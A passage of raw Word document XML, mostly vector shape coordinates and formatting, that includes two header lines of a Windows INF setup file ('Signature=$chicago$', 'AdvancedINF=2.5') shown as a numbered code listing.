        <v:shape style="position:absolute;left:3010;top:13870;width:130;height:270" coordorigin="3010,13870" coordsize="130,270" path="m3026,13891l3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3026,13891,3027,13891,3027,13891,3027,13891,3027,13891,3027,13891,3027,13891,3027,13891,3028,13891,3028,13891,3028,13891,3028,13891,3029,13891,3029,13891,3029,13891,3029,13891,3030,13891,3030,13891,3030,13891,3031,13891,3031,13891,3032,13891,3032,13891,3032,13891,3033,13891,3033,13891,3034,13891,3034,13891,3035,13891,3036,13891,3036,13891,3037,13891,3037,13891,3038,13891,3039,13891,3039,13891,3040,13891,3041,13891,3042,13891,3043,13891,3043,13891,3044,13891,3045,13891,3046,13891,3047,13891,3048,13891,3049,13891,3050,13891,3051,13891,3052,13891,3053,13891,3054,13891,3056,13891,3057,13891,3058,13891,3059,13891,3061,13891,3062,13891,3063,13891,3065,13891,3066,13891,3068,13891,3069,13891,3071,13891,3072,13891,3074,13891,3076,13891,3077,13891,3079,13891,3081,13891,3083,13891,3085,13891,3087,13891,3089,13891,3091,13891,3093,13891,3095,13891,3097,13891,3099,13891,3101,13891,3103,13891,3106,13891,3108,13891,3110,13891,3113,13891,3115,13891,3118,13891,3120,13891,3123,13891,3126,13891,3128,13891,3131,13891,3134,13891,3137,13891,3140,13891,3143,13891,3146,13891,3146,13891,3146,13891,3146,13891,3146,13891,3146,13891,3146,13891,3146,13891,3146,13891,3146,13891,3146,13891,3146,13891,3146,13891,3146,13891,3146,13891,3146,13891,3146,13892,3146,13892,3146,13892,3146,13892,3146,13892,3146,13892,3146,13892,3146,13893,3146,13893,3146,13893,3146,13893,3146,13894,3146,13894,3146,13894,3146,13895,3146,13895,3146,13896,3146,13896,3146,13896,3146,13897,3146,13897,3146,13898,3146,13899,3146,13899,3146,13900,3146,13901,3146,13901,3146,13902,3146,13903,3146,13904,3146,13905,3146,13906,3146,13907,3146,13908,3146,13909,3146,13910,3146,13911,3146,13912,3146,13914,3146,13915,3146,13916,3146,13918,3146,13919,3146,13921,3146,13922,3146,13924,3146,13925,3146,13927,3146,13929,3146,13931,3146,13933,3146,13935,3146,13937,3146,13939,3146,13941,3146,13943,3146,13945,3146,13948,3146,13950,3146,13952,3146,13955,3146,13957,3146,13960,3146,13963,3146,13966,3146,13969,3146,13971,3146,13974,3146,13978,3146,13981,3146,13984,3146,13987,3146,13991,3146,13994,3146,13998,3146,14001,3146,14005,3146,14009,3146,14013,3146,14017,3146,14021,3146,14025,3146,14029,3146,14033,3146,14038,3146,14042,3146,14047,3146,14052,3146,14056,3146,14061,3146,14066,3146,14071,3146,14076,3146,14082,3146,14087,3146,14093,3146,14098,3146,14104,3146,14109,3146,14115,3146,14121,3146,14127,3146,14133,3146,14140,3146,14146,3146,14146,3146,14146,3146,14146,3146,14146,3146,14146,3146,14146,3146,14146,3146,14146,3146,14146,3146,14146,3146,14146,3145,14146,3145,14146,3145,14146,3145,14146,3145,14146,3145,14146,3145,14146,3145,14146,3145,14146,3145,14146,3145,14146,3145,14146,3145,14146,3145,14146,3144,14146,3144,14146,3144,14146,3144,14146,3144,14146,3144,14146,3143,14146,3143,14146,3143,14146,3143,14146,3143,14146,3142,14146,3142,14146,3142,14146,3141,14146,3141,14146,3141,14146,3140,14146,3140,14146,3140,14146,3139,14146,3139,14146,3138,14146,3138,14146,3137,14146,3137,14146,3136,14146,3136,14146,3135,14146,3134,14146,3134,14146,3133,14146,3132,14146,3132,14146,3131,14146,3130,14146,3129,14146,3129,14146,3128,14146,3127,14146,3126,14146,3125,14146,3124,14146,3123,14146,3122,14146,3121,14146,3120,14146,3119,14146,3118,14146,3117,14146,3116,14146,3114,14146,3113,14146,3112,14146,3110,14146,3109,14146,3108,14146,3106,14146,3105,14146,3103,14146,3102,14146,3100,14146,3099,14146,3097,14146,3095,14146,3094,14146,3092,14146,3090,14146,3088,14146,3086,14146,3084,14146,3083,14146,3081,14146,3079,14146,3076,14146,3074,14146,3072,14146,3070,14146,3068,14146,3065,14146,3063,14146,3061,14146,3058,14146,3056,14146,3053,14146,3051,14146,3048,14146,3045,14146,3043,14146,3040,14146,3037,14146,3034,14146,3031,14146,3029,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14146,3026,14145,3026,14145,3026,14145,3026,14145,3026,14145,3026,14145,3026,14144,3026,14144,3026,14144,3026,14143,3026,14143,3026,14143,3026,14142,3026,14142,3026,14142,3026,14141,3026,14141,3026,14140,3026,14140,3026,14139,3026,14138,3026,14138,3026,14137,3026,14136,3026,14136,3026,14135,3026,14134,3026,14133,3026,14132,3026,14131,3026,14130,3026,14129,3026,14128,3026,14127,3026,14126,3026,14125,3026,14124,3026,14122,3026,14121,3026,14120,3026,14118,3026,14117,3026,14115,3026,14113,3026,14112,3026,14110,3026,14108,3026,14106,3026,14105,3026,14103,3026,14101,3026,14099,3026,14096,3026,14094,3026,14092,3026,14090,3026,14087,3026,14085,3026,14082,3026,14080,3026,14077,3026,14074,3026,14071,3026,14069,3026,14066,3026,14063,3026,14060,3026,14056,3026,14053,3026,14050,3026,14046,3026,14043,3026,14039,3026,14036,3026,14032,3026,14028,3026,14024,3026,14020,3026,14016,3026,14012,3026,14008,3026,14004,3026,13999,3026,13995,3026,13990,3026,13985,3026,13981,3026,13976,3026,13971,3026,13966,3026,13961,3026,13955,3026,13950,3026,13945,3026,13939,3026,13933,3026,13928,3026,13922,3026,13916,3026,13910,3026,13904,3026,13897,3026,13891e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:252.500pt;margin-top:711.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5050,14230" coordsize="130,270">
        <v:shape style="position:absolute;left:5050;top:14230;width:130;height:270" coordorigin="5050,14230" coordsize="130,270" path="m5067,14251l5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5067,14251,5068,14251,5068,14251,5068,14251,5068,14251,5068,14251,5068,14251,5068,14251,5069,14251,5069,14251,5069,14251,5069,14251,5070,14251,5070,14251,5070,14251,5070,14251,5071,14251,5071,14251,5071,14251,5072,14251,5072,14251,5073,14251,5073,14251,5073,14251,5074,14251,5074,14251,5075,14251,5075,14251,5076,14251,5077,14251,5077,14251,5078,14251,5078,14251,5079,14251,5080,14251,5080,14251,5081,14251,5082,14251,5083,14251,5084,14251,5084,14251,5085,14251,5086,14251,5087,14251,5088,14251,5089,14251,5090,14251,5091,14251,5092,14251,5093,14251,5094,14251,5095,14251,5097,14251,5098,14251,5099,14251,5100,14251,5102,14251,5103,14251,5104,14251,5106,14251,5107,14251,5109,14251,5110,14251,5112,14251,5113,14251,5115,14251,5117,14251,5118,14251,5120,14251,5122,14251,5124,14251,5126,14251,5128,14251,5130,14251,5132,14251,5134,14251,5136,14251,5138,14251,5140,14251,5142,14251,5144,14251,5147,14251,5149,14251,5151,14251,5154,14251,5156,14251,5159,14251,5161,14251,5164,14251,5167,14251,5169,14251,5172,14251,5175,14251,5178,14251,5181,14251,5184,14251,5187,14251,5187,14251,5187,14251,5187,14251,5187,14251,5187,14251,5187,14251,5187,14251,5187,14251,5187,14251,5187,14251,5187,14251,5187,14251,5187,14251,5187,14252,5187,14252,5187,14252,5187,14252,5187,14252,5187,14252,5187,14252,5187,14252,5187,14253,5187,14253,5187,14253,5187,14253,5187,14254,5187,14254,5187,14254,5187,14255,5187,14255,5187,14255,5187,14256,5187,14256,5187,14257,5187,14257,5187,14258,5187,14258,5187,14259,5187,14259,5187,14260,5187,14261,5187,14262,5187,14262,5187,14263,5187,14264,5187,14265,5187,14266,5187,14267,5187,14268,5187,14269,5187,14270,5187,14271,5187,14272,5187,14274,5187,14275,5187,14276,5187,14278,5187,14279,5187,14281,5187,14282,5187,14284,5187,14286,5187,14287,5187,14289,5187,14291,5187,14293,5187,14295,5187,14297,5187,14299,5187,14301,5187,14303,5187,14305,5187,14308,5187,14310,5187,14313,5187,14315,5187,14318,5187,14320,5187,14323,5187,14326,5187,14329,5187,14332,5187,14335,5187,14338,5187,14341,5187,14344,5187,14347,5187,14351,5187,14354,5187,14358,5187,14362,5187,14365,5187,14369,5187,14373,5187,14377,5187,14381,5187,14385,5187,14389,5187,14394,5187,14398,5187,14403,5187,14407,5187,14412,5187,14417,5187,14421,5187,14426,5187,14431,5187,14437,5187,14442,5187,14447,5187,14453,5187,14458,5187,14464,5187,14470,5187,14475,5187,14481,5187,14487,5187,14494,5187,14500,5187,14506,5187,14506,5187,14506,5187,14506,5187,14506,5187,14506,5187,14506,5187,14506,5187,14506,5187,14506,5187,14506,5187,14506,5187,14506,5186,14506,5186,14506,5186,14506,5186,14506,5186,14506,5186,14506,5186,14506,5186,14506,5186,14506,5186,14506,5186,14506,5186,14506,5186,14506,5185,14506,5185,14506,5185,14506,5185,14506,5185,14506,5185,14506,5184,14506,5184,14506,5184,14506,5184,14506,5184,14506,5183,14506,5183,14506,5183,14506,5182,14506,5182,14506,5182,14506,5181,14506,5181,14506,5181,14506,5180,14506,5180,14506,5179,14506,5179,14506,5178,14506,5178,14506,5177,14506,5177,14506,5176,14506,5175,14506,5175,14506,5174,14506,5173,14506,5173,14506,5172,14506,5171,14506,5170,14506,5170,14506,5169,14506,5168,14506,5167,14506,5166,14506,5165,14506,5164,14506,5163,14506,5162,14506,5161,14506,5160,14506,5159,14506,5158,14506,5157,14506,5155,14506,5154,14506,5153,14506,5151,14506,5150,14506,5149,14506,5147,14506,5146,14506,5144,14506,5143,14506,5141,14506,5140,14506,5138,14506,5136,14506,5135,14506,5133,14506,5131,14506,5129,14506,5127,14506,5126,14506,5124,14506,5122,14506,5120,14506,5117,14506,5115,14506,5113,14506,5111,14506,5109,14506,5106,14506,5104,14506,5102,14506,5099,14506,5097,14506,5094,14506,5092,14506,5089,14506,5087,14506,5084,14506,5081,14506,5078,14506,5075,14506,5073,14506,5070,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14506,5067,14505,5067,14505,5067,14505,5067,14505,5067,14505,5067,14504,5067,14504,5067,14504,5067,14504,5067,14503,5067,14503,5067,14503,5067,14502,5067,14502,5067,14501,5067,14501,5067,14500,5067,14500,5067,14499,5067,14499,5067,14498,5067,14497,5067,14497,5067,14496,5067,14495,5067,14494,5067,14493,5067,14493,5067,14492,5067,14491,5067,14490,5067,14488,5067,14487,5067,14486,5067,14485,5067,14484,5067,14482,5067,14481,5067,14480,5067,14478,5067,14477,5067,14475,5067,14474,5067,14472,5067,14470,5067,14468,5067,14467,5067,14465,5067,14463,5067,14461,5067,14459,5067,14457,5067,14454,5067,14452,5067,14450,5067,14447,5067,14445,5067,14442,5067,14440,5067,14437,5067,14434,5067,14432,5067,14429,5067,14426,5067,14423,5067,14420,5067,14417,5067,14413,5067,14410,5067,14407,5067,14403,5067,14400,5067,14396,5067,14392,5067,14388,5067,14385,5067,14381,5067,14377,5067,14372,5067,14368,5067,14364,5067,14359,5067,14355,5067,14350,5067,14346,5067,14341,5067,14336,5067,14331,5067,14326,5067,14321,5067,14316,5067,14310,5067,14305,5067,14299,5067,14294,5067,14288,5067,14282,5067,14276,5067,14270,5067,14264,5067,14258,5067,14251e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:282.500pt;margin-top:711.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5650,14230" coordsize="130,270">
        <v:shape style="position:absolute;left:5650;top:14230;width:130;height:270" coordorigin="5650,14230" coordsize="130,270" path="m5667,14251l5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5667,14251,5668,14251,5668,14251,5668,14251,5668,14251,5668,14251,5668,14251,5668,14251,5668,14251,5669,14251,5669,14251,5669,14251,5669,14251,5669,14251,5670,14251,5670,14251,5670,14251,5670,14251,5671,14251,5671,14251,5671,14251,5672,14251,5672,14251,5673,14251,5673,14251,5673,14251,5674,14251,5674,14251,5675,14251,5675,14251,5676,14251,5676,14251,5677,14251,5677,14251,5678,14251,5679,14251,5679,14251,5680,14251,5681,14251,5681,14251,5682,14251,5683,14251,5684,14251,5685,14251,5686,14251,5686,14251,5687,14251,5688,14251,5689,14251,5690,14251,5691,14251,5692,14251,5693,14251,5695,14251,5696,14251,5697,14251,5698,14251,5699,14251,5701,14251,5702,14251,5703,14251,5705,14251,5706,14251,5708,14251,5709,14251,5711,14251,5712,14251,5714,14251,5715,14251,5717,14251,5719,14251,5721,14251,5722,14251,5724,14251,5726,14251,5728,14251,5730,14251,5732,14251,5734,14251,5736,14251,5738,14251,5740,14251,5742,14251,5745,14251,5747,14251,5749,14251,5752,14251,5754,14251,5757,14251,5759,14251,5762,14251,5764,14251,5767,14251,5770,14251,5772,14251,5775,14251,5778,14251,5781,14251,5784,14251,5787,14251,5787,14251,5787,14251,5787,14251,5787,14251,5787,14251,5787,14251,5787,14251,5787,14251,5787,14251,5787,14251,5787,14251,5787,14251,5787,14251,5787,14252,5787,14252,5787,14252,5787,14252,5787,14252,5787,14252,5787,14252,5787,14252,5787,14253,5787,14253,5787,14253,5787,14253,5787,14254,5787,14254,5787,14254,5787,14255,5787,14255,5787,14255,5787,14256,5787,14256,5787,14257,5787,14257,5787,14258,5787,14258,5787,14259,5787,14259,5787,14260,5787,14261,5787,14262,5787,14262,5787,14263,5787,14264,5787,14265,5787,14266,5787,14267,5787,14268,5787,14269,5787,14270,5787,14271,5787,14272,5787,14274,5787,14275,5787,14276,5787,14278,5787,14279,5787,14281,5787,14282,5787,14284,5787,14286,5787,14287,5787,14289,5787,14291,5787,14293,5787,14295,5787,14297,5787,14299,5787,14301,5787,14303,5787,14305,5787,14308,5787,14310,5787,14313,5787,14315,5787,14318,5787,14320,5787,14323,5787,14326,5787,14329,5787,14332,5787,14335,5787,14338,5787,14341,5787,14344,5787,14347,5787,14351,5787,14354,5787,14358,5787,14362,5787,14365,5787,14369,5787,14373,5787,14377,5787,14381,5787,14385,5787,14389,5787,14394,5787,14398,5787,14403,5787,14407,5787,14412,5787,14417,5787,14421,5787,14426,5787,14431,5787,14437,5787,14442,5787,14447,5787,14453,5787,14458,5787,14464,5787,14470,5787,14475,5787,14481,5787,14487,5787,14494,5787,14500,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5787,14506,5786,14506,5786,14506,5786,14506,5786,14506,5786,14506,5786,14506,5786,14506,5786,14506,5786,14506,5786,14506,5785,14506,5785,14506,5785,14506,5785,14506,5785,14506,5784,14506,5784,14506,5784,14506,5784,14506,5783,14506,5783,14506,5783,14506,5782,14506,5782,14506,5782,14506,5781,14506,5781,14506,5780,14506,5780,14506,5780,14506,5779,14506,5779,14506,5778,14506,5777,14506,5777,14506,5776,14506,5776,14506,5775,14506,5774,14506,5774,14506,5773,14506,5772,14506,5772,14506,5771,14506,5770,14506,5769,14506,5768,14506,5767,14506,5766,14506,5765,14506,5765,14506,5764,14506,5762,14506,5761,14506,5760,14506,5759,14506,5758,14506,5757,14506,5756,14506,5754,14506,5753,14506,5752,14506,5750,14506,5749,14506,5748,14506,5746,14506,5745,14506,5743,14506,5742,14506,5740,14506,5738,14506,5737,14506,5735,14506,5733,14506,5731,14506,5730,14506,5728,14506,5726,14506,5724,14506,5722,14506,5720,14506,5718,14506,5716,14506,5714,14506,5711,14506,5709,14506,5707,14506,5704,14506,5702,14506,5700,14506,5697,14506,5695,14506,5692,14506,5689,14506,5687,14506,5684,14506,5681,14506,5679,14506,5676,14506,5673,14506,5670,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14506,5667,14505,5667,14505,5667,14505,5667,14505,5667,14505,5667,14504,5667,14504,5667,14504,5667,14504,5667,14503,5667,14503,5667,14503,5667,14502,5667,14502,5667,14501,5667,14501,5667,14500,5667,14500,5667,14499,5667,14499,5667,14498,5667,14497,5667,14497,5667,14496,5667,14495,5667,14494,5667,14493,5667,14493,5667,14492,5667,14491,5667,14490,5667,14488,5667,14487,5667,14486,5667,14485,5667,14484,5667,14482,5667,14481,5667,14480,5667,14478,5667,14477,5667,14475,5667,14474,5667,14472,5667,14470,5667,14468,5667,14467,5667,14465,5667,14463,5667,14461,5667,14459,5667,14457,5667,14454,5667,14452,5667,14450,5667,14447,5667,14445,5667,14442,5667,14440,5667,14437,5667,14434,5667,14432,5667,14429,5667,14426,5667,14423,5667,14420,5667,14417,5667,14413,5667,14410,5667,14407,5667,14403,5667,14400,5667,14396,5667,14392,5667,14388,5667,14385,5667,14381,5667,14377,5667,14372,5667,14368,5667,14364,5667,14359,5667,14355,5667,14350,5667,14346,5667,14341,5667,14336,5667,14331,5667,14326,5667,14321,5667,14316,5667,14310,5667,14305,5667,14299,5667,14294,5667,14288,5667,14282,5667,14276,5667,14270,5667,14264,5667,14258,5667,14251e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:180.500pt;margin-top:730.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3610,14610" coordsize="130,270">
        <v:shape style="position:absolute;left:3610;top:14610;width:130;height:270" coordorigin="3610,14610" coordsize="130,270" path="m3626,14626l3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3626,14626,3627,14626,3627,14626,3627,14626,3627,14626,3627,14626,3627,14626,3627,14626,3628,14626,3628,14626,3628,14626,3628,14626,3628,14626,3629,14626,3629,14626,3629,14626,3629,14626,3630,14626,3630,14626,3630,14626,3631,14626,3631,14626,3631,14626,3632,14626,3632,14626,3633,14626,3633,14626,3634,14626,3634,14626,3635,14626,3635,14626,3636,14626,3636,14626,3637,14626,3638,14626,3638,14626,3639,14626,3640,14626,3640,14626,3641,14626,3642,14626,3643,14626,3644,14626,3645,14626,3645,14626,3646,14626,3647,14626,3648,14626,3649,14626,3650,14626,3651,14626,3652,14626,3654,14626,3655,14626,3656,14626,3657,14626,3658,14626,3660,14626,3661,14626,3662,14626,3664,14626,3665,14626,3667,14626,3668,14626,3670,14626,3671,14626,3673,14626,3674,14626,3676,14626,3678,14626,3680,14626,3681,14626,3683,14626,3685,14626,3687,14626,3689,14626,3691,14626,3693,14626,3695,14626,3697,14626,3699,14626,3701,14626,3704,14626,3706,14626,3708,14626,3711,14626,3713,14626,3716,14626,3718,14626,3721,14626,3723,14626,3726,14626,3729,14626,3731,14626,3734,14626,3737,14626,3740,14626,3743,14626,3746,14626,3746,14626,3746,14626,3746,14626,3746,14626,3746,14626,3746,14626,3746,14626,3746,14626,3746,14626,3746,14626,3746,14627,3746,14627,3746,14627,3746,14627,3746,14627,3746,14627,3746,14627,3746,14627,3746,14627,3746,14627,3746,14628,3746,14628,3746,14628,3746,14628,3746,14628,3746,14629,3746,14629,3746,14629,3746,14630,3746,14630,3746,14630,3746,14631,3746,14631,3746,14632,3746,14632,3746,14633,3746,14633,3746,14634,3746,14635,3746,14635,3746,14636,3746,14637,3746,14638,3746,14638,3746,14639,3746,14640,3746,14641,3746,14642,3746,14643,3746,14644,3746,14645,3746,14646,3746,14648,3746,14649,3746,14650,3746,14652,3746,14653,3746,14654,3746,14656,3746,14657,3746,14659,3746,14661,3746,14662,3746,14664,3746,14666,3746,14668,3746,14670,3746,14672,3746,14674,3746,14676,3746,14678,3746,14681,3746,14683,3746,14685,3746,14688,3746,14690,3746,14693,3746,14695,3746,14698,3746,14701,3746,14704,3746,14707,3746,14710,3746,14713,3746,14716,3746,14719,3746,14723,3746,14726,3746,14730,3746,14733,3746,14737,3746,14740,3746,14744,3746,14748,3746,14752,3746,14756,3746,14760,3746,14765,3746,14769,3746,14773,3746,14778,3746,14782,3746,14787,3746,14792,3746,14797,3746,14802,3746,14807,3746,14812,3746,14817,3746,14822,3746,14828,3746,14833,3746,14839,3746,14845,3746,14851,3746,14857,3746,14863,3746,14869,3746,14875,3746,14881,3746,14881,3746,14882,3746,14881,3746,14882,3746,14881,3746,14881,3746,14881,3746,14881,3746,14881,3746,14881,3746,14882,3746,14881,3746,14882,3746,14881,3746,14882,3746,14882,3746,14881,3746,14881,3745,14881,3745,14882,3745,14881,3745,14882,3745,14882,3745,14882,3745,14882,3745,14881,3745,14882,3744,14881,3744,14881,3744,14882,3744,14882,3744,14881,3744,14882,3743,14881,3743,14881,3743,14881,3743,14882,3742,14881,3742,14882,3742,14881,3741,14882,3741,14881,3741,14882,3740,14881,3740,14882,3739,14881,3739,14882,3738,14881,3738,14882,3738,14881,3737,14882,3736,14881,3736,14882,3735,14881,3735,14881,3734,14881,3733,14882,3733,14881,3732,14882,3731,14881,3730,14881,3730,14881,3729,14881,3728,14881,3727,14881,3726,14881,3725,14881,3724,14881,3723,14881,3722,14881,3721,14881,3720,14881,3719,14881,3718,14881,3717,14881,3716,14881,3715,14881,3713,14881,3712,14881,3711,14881,3709,14881,3708,14881,3707,14881,3705,14881,3704,14881,3702,14881,3701,14881,3699,14881,3697,14881,3696,14881,3694,14881,3692,14881,3690,14881,3689,14881,3687,14881,3685,14882,3683,14881,3681,14881,3679,14881,3677,14881,3675,14881,3672,14881,3670,14881,3668,14881,3666,14881,3663,14881,3661,14881,3659,14882,3656,14881,3654,14881,3651,14881,3648,14881,3646,14881,3643,14881,3640,14881,3638,14881,3635,14881,3632,14881,3629,14882,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14881,3626,14880,3626,14880,3626,14880,3626,14880,3626,14880,3626,14879,3626,14879,3626,14879,3626,14879,3626,14878,3626,14878,3626,14877,3626,14877,3626,14877,3626,14876,3626,14876,3626,14875,3626,14874,3626,14874,3626,14873,3626,14873,3626,14872,3626,14871,3626,14870,3626,14869,3626,14869,3626,14868,3626,14867,3626,14866,3626,14865,3626,14864,3626,14863,3626,14861,3626,14860,3626,14859,3626,14858,3626,14856,3626,14855,3626,14853,3626,14852,3626,14850,3626,14849,3626,14847,3626,14845,3626,14844,3626,14842,3626,14840,3626,14838,3626,14836,3626,14834,3626,14832,3626,14830,3626,14827,3626,14825,3626,14823,3626,14820,3626,14818,3626,14815,3626,14812,3626,14810,3626,14807,3626,14804,3626,14801,3626,14798,3626,14795,3626,14792,3626,14789,3626,14785,3626,14782,3626,14778,3626,14775,3626,14771,3626,14767,3626,14764,3626,14760,3626,14756,3626,14752,3626,14748,3626,14743,3626,14739,3626,14735,3626,14730,3626,14726,3626,14721,3626,14716,3626,14711,3626,14706,3626,14701,3626,14696,3626,14691,3626,14685,3626,14680,3626,14674,3626,14669,3626,14663,3626,14657,3626,14651,3626,14645,3626,14639,3626,14633,3626,14626e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>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308" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="91"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>$chicago$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="8032" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AdvancedINF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
